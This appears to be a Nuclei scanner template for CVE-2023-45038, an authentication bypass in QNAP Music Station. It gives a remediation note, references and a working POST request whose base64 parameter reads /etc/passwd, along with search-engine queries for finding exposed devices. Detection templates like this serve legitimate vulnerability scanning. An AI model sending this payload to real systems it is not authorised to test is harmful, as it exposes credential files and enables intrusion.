id: CVE-2023-45038 info: name: QNAP Music Station < 5.4.0 - Authentication Bypass author: daffainfo severity: medium description: | An improper authentication vulnerability has been reported to affect Music Station. If exploited, the vulnerability could allow users to compromise the security of the system via a network. We have already fixed the vulnerability in the following version: Music Station 5.4.0 and later impact: | Unauthenticated attackers can bypass authentication in Music Station to read arbitrary files from the QNAP system including /etc/passwd, potentially accessing sensitive configuration files and user credentials. remediation: | Update QNAP Music Station to version 5.4.0 or later that implements proper authentication validation in the as_get_file_api.php endpoint. reference: - https://www.qnap.com/en/security-advisory/qsa-24-25 - https://karzemrok.com/qnap-qsa-24-25 - https://nvd.nist.gov/vuln/detail/CVE-2023-45038 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2023-45038 epss-score: 0.06906 epss-percentile: 0.9155 cwe-id: CWE-287 cpe: cpe:2.3:a:qnap:music_station:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: qnap product: music_station shodan-query: http.title:"qnap" fofa-query: title="qnap" google-query: intitle:"qnap" tags: cve,cve2023,qnap,music_station,auth-bypass,vkev http: - raw: - | POST /musicstation/api/as_get_file_api.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded ssid=dummy&songid=1&tt=ts&f=L2V0Yy9wYXNzd2Q= matchers-condition: and matchers: - type: regex part: body regex: - "admin:.*:0:0:" - type: word part: content_disposition words: - "filename='passwd'" - type: status status: - 200 # digest: 4a0a00473045022079f9a8c237ebb840ab7dda5190a3b53514d83f811a442e6836694edd607a7ea3022100b6af068b8cc62db31abd7218d311aa9ba611b41a2dfd9b72eb2d04b29c8386a8:922c64590222798bb761d5b6d8e72950